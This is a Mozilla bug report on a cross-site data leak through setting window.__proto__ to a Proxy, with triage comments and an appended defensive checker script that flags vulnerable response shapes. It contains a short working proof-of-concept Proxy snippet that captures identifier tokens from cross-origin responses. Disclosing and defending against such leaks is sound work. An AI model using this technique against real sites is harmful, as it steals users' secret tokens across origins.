Bug 1099081 (Closed)
Opened 10 years ago
Closed 10 years ago
Cross-site data leak using window.__proto__ = new Proxy
Categories: Core :: Security, defect
Status: RESOLVED DUPLICATE of bug 1048535
People: Reporter: till, Unassigned
Details: Keywords: sec-moderate, wsec-disclosure
Setting window.__proto__, it's possible to intercept data from other domains as long as the data consists of either a single token that's a valid JS identifier, or a list of such tokens.
See https://twitter.com/steike/status/533198334547468288 for a POC.
It's actually even simpler to implement this using ES6-style proxies:
window.__proto__ = new Proxy({}, {
  get: function(target, name) {console.log(name); return true;},
  has: function(target, name) {return true}
});
Examples of request results this works for:
"foo05120820e156c2f445f670759be64420" (from the original POC)
"foo,bar"
"foo,
bar,
baz"
"foo;bar"
Comment 1•10 years ago
Calling this sec-moderate (maybe even sec-low?, because it relies on a web app that is not securing its "secret tokens" in a best-practice way).
Dan, can you think of something we could do about this?
Keywords: sec-moderate, wsec-disclosure
Updated•10 years ago
Status: NEW → RESOLVED
Closed: 10 years ago
Resolution: --- → DUPLICATE
Comment 3•10 years ago
This bug has been marked as a duplicate of a restricted bug.
If it's an exact duplicate, we should consider opening up bug 1048535.
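Added example, not part of the original report or of Mozilla's code: a check a site owner could run over token-bearing responses to see whether a body has the shape the description says can be intercepted (a single valid JS identifier, or a list of them). The function name, the constructed sample bodies, and the treatment of a bare line break as a statement separator are assumptions of this example.

```javascript
// Added example: reports whether a response body has the shape the report
// describes (one JS identifier, or a list of them), i.e. would parse as a
// classic script consisting only of global-name lookups.

// Keywords and literals: not valid identifiers, so they do not fit the shape.
const RESERVED = new Set((
  "break case catch class const continue debugger default delete do else enum " +
  "export extends false finally for function if import in instanceof new null " +
  "return super switch this throw true try typeof var void while with"
).split(" "));

const ID = "[\\p{ID_Start}$_][\\p{ID_Continue}$\\u200c\\u200d]*";
// Comma-separated identifiers; white space and line breaks may surround commas.
const LIST = `${ID}(?:\\s*,\\s*${ID})*`;
// Assumption: a statement ends at ";" or at a line break (semicolon insertion).
const END = "[\\s;]*[;\\n\\r\\u2028\\u2029][\\s;]*";
const SHAPE = new RegExp(`^[\\s;]*${LIST}(?:${END}${LIST})*[\\s;]*$`, "u");

// Returns the identifier tokens if the whole body fits the shape, else null.
function identifierTokens(body) {
  if (!SHAPE.test(body)) return null;
  const tokens = body.match(new RegExp(ID, "gu"));
  return tokens.some((t) => RESERVED.has(t)) ? null : tokens;
}

// Bodies quoted in the report, followed by constructed ones for contrast.
const SAMPLES = [
  "foo05120820e156c2f445f670759be64420",
  "foo,bar",
  "foo,\nbar,\nbaz",
  "foo;bar",
  '{"token":"foo05120820e156c2f445f670759be64420"}', // constructed: JSON object
  "05120820e156c2f445f670759be64420",                 // constructed: leading digit
  "foo bar",                                          // constructed: syntax error
];

for (const body of SAMPLES) {
  console.log(JSON.stringify(body), "->", JSON.stringify(identifierTokens(body)));
}
```

A `null` result means only that the body does not have this particular shape; it is not a statement about other ways a response can be read when included as a script.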